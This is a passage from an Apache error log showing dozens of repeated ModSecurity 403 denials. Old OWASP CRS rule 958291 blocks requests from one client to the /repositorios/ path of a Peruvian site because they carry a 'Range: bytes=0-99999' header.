"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRKvoDupyaoF2tAucUQAAANA"] [Mon Feb 17 10:35:32.198763 2025] [:error] [pid 11230:tid 140634354153216] [client 190.102.150.245:36102] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRKvoDupyaoF2tAucUgAAAMA"] [Mon Feb 17 10:35:32.294599 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36104] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRKvoDupyaoF2tAucUwAAAME"] [Mon Feb 17 10:35:32.390026 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:36106] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRKvoDupyaoF2tAucVAAAANY"] [Mon Feb 17 10:35:32.485703 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:36108] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRKvoDupyaoF2tAucVQAAAMc"] [Mon Feb 17 10:35:32.582063 2025] [:error] [pid 11230:tid 140634216171264] [client 190.102.150.245:36110] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRKvoDupyaoF2tAucVgAAAMg"] [Mon Feb 17 10:35:32.677938 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:36112] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRKvoDupyaoF2tAucVwAAAMI"] [Mon Feb 17 10:35:32.773601 2025] [:error] [pid 11230:tid 140634174207744] [client 190.102.150.245:36114] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRKvoDupyaoF2tAucWAAAAM0"] [Mon Feb 17 10:35:32.873366 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:36116] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRKvoDupyaoF2tAucWQAAAMk"] [Mon Feb 17 10:35:32.974455 2025] [:error] [pid 11230:tid 140634107066112] [client 190.102.150.245:36118] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRKvoDupyaoF2tAucWgAAANU"] [Mon Feb 17 10:35:33.070547 2025] [:error] [pid 11230:tid 140634190993152] [client 190.102.150.245:36120] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRavoDupyaoF2tAucWwAAAMs"] [Mon Feb 17 10:35:33.170306 2025] [:error] [pid 11230:tid 140634081888000] [client 190.102.150.245:36122] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRavoDupyaoF2tAucXAAAANg"] [Mon Feb 17 10:35:33.267187 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36124] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRavoDupyaoF2tAucXQAAANM"] [Mon Feb 17 10:35:33.364069 2025] [:error] [pid 11230:tid 140634232956672] [client 190.102.150.245:36126] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRavoDupyaoF2tAucXgAAAMY"] [Mon Feb 17 10:35:33.460286 2025] [:error] [pid 11230:tid 140634149029632] [client 190.102.150.245:36128] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRavoDupyaoF2tAucXwAAANA"] [Mon Feb 17 10:35:33.556661 2025] [:error] [pid 11230:tid 140634115458816] [client 190.102.150.245:36130] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRavoDupyaoF2tAucYAAAANQ"] [Mon Feb 17 10:35:33.652831 2025] [:error] [pid 11230:tid 140634132244224] [client 190.102.150.245:36132] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRavoDupyaoF2tAucYQAAANI"] [Mon Feb 17 10:35:33.749398 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36134] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRavoDupyaoF2tAucYgAAAME"] [Mon Feb 17 10:35:33.845257 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:36136] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRavoDupyaoF2tAucYwAAANY"] [Mon Feb 17 10:35:33.941497 2025] [:error] [pid 10663:tid 140634165815040] [client 190.102.150.245:36138] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRbUcx1xj5z0EGUpRggAAAE4"] [Mon Feb 17 10:35:34.039465 2025] [:error] [pid 10663:tid 140634157422336] [client 190.102.150.245:36140] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRrUcx1xj5z0EGUpRgwAAAE8"] [Mon Feb 17 10:35:34.137053 2025] [:error] [pid 10663:tid 140634123851520] [client 190.102.150.245:36142] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRrUcx1xj5z0EGUpRhAAAAFM"] [Mon Feb 17 10:35:34.233280 2025] [:error] [pid 10664:tid 140634081888000] [client 190.102.150.245:36144] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRgJrayd7JfpBdXs7ogAAAJg"] [Mon Feb 17 10:35:34.330872 2025] [:error] [pid 10664:tid 140634199385856] [client 190.102.150.245:36146] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRgJrayd7JfpBdXs7owAAAIo"] [Mon Feb 17 10:35:34.432540 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:36148] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRqvoDupyaoF2tAucZAAAAMc"] [Mon Feb 17 10:35:34.529213 2025] [:error] [pid 11230:tid 140634090280704] [client 190.102.150.245:36150] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRqvoDupyaoF2tAucZQAAANc"] [Mon Feb 17 10:35:34.625247 2025] [:error] [pid 10664:tid 140634182600448] [client 190.102.150.245:36152] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRgJrayd7JfpBdXs7pAAAAIw"] [Mon Feb 17 10:35:34.728672 2025] [:error] [pid 11230:tid 140634216171264] [client 190.102.150.245:36154] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRqvoDupyaoF2tAucZgAAAMg"] [Mon Feb 17 10:35:34.825800 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:36156] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRqvoDupyaoF2tAucZwAAAMI"] [Mon Feb 17 10:35:34.921801 2025] [:error] [pid 10663:tid 140634098673408] [client 190.102.150.245:36158] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRrUcx1xj5z0EGUpRhQAAAFY"] [Mon Feb 17 10:35:35.023668 2025] [:error] [pid 10662:tid 140634140636928] [client 190.102.150.245:36160] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXR__97XY8xax64gWTjgAAABE"] [Mon Feb 17 10:35:35.120687 2025] [:error] [pid 10662:tid 140634249742080] [client 190.102.150.245:36162] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXR__97XY8xax64gWTjwAAAAQ"] [Mon Feb 17 10:35:35.217930 2025] [:error] [pid 10662:tid 140634232956672] [client 190.102.150.245:36164] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXR__97XY8xax64gWTkAAAAAY"] [Mon Feb 17 10:35:35.314176 2025] [:error] [pid 11230:tid 140634174207744] [client 190.102.150.245:36166] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXR6voDupyaoF2tAucaAAAAM0"] [Mon Feb 17 10:35:35.410276 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:36168] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXR6voDupyaoF2tAucaQAAAMk"] [Mon Feb 17 10:35:35.506244 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:36170] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXR6voDupyaoF2tAucagAAAM4"] [Mon Feb 17 10:35:35.603042 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:36172] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXR6voDupyaoF2tAucawAAAMQ"] [Mon Feb 17 10:35:35.698929 2025] [:error] [pid 11230:tid 140634081888000] [client 190.102.150.245:36174] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXR6voDupyaoF2tAucbAAAANg"] [Mon Feb 17 10:35:35.797263 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36176] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXR6voDupyaoF2tAucbQAAANM"] [Mon Feb 17 10:35:35.893543 2025] [:error] [pid 11230:tid 140634258134784] [client 190.102.150.245:36178] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXR6voDupyaoF2tAucbgAAAMM"] [Mon Feb 17 10:35:35.990947 2025] [:error] [pid 11230:tid 140634115458816] [client 190.102.150.245:36180] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXR6voDupyaoF2tAucbwAAANQ"] [Mon Feb 17 10:35:36.088729 2025] [:error] [pid 11230:tid 140634132244224] [client 190.102.150.245:36182] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXSKvoDupyaoF2tAuccAAAANI"] [Mon Feb 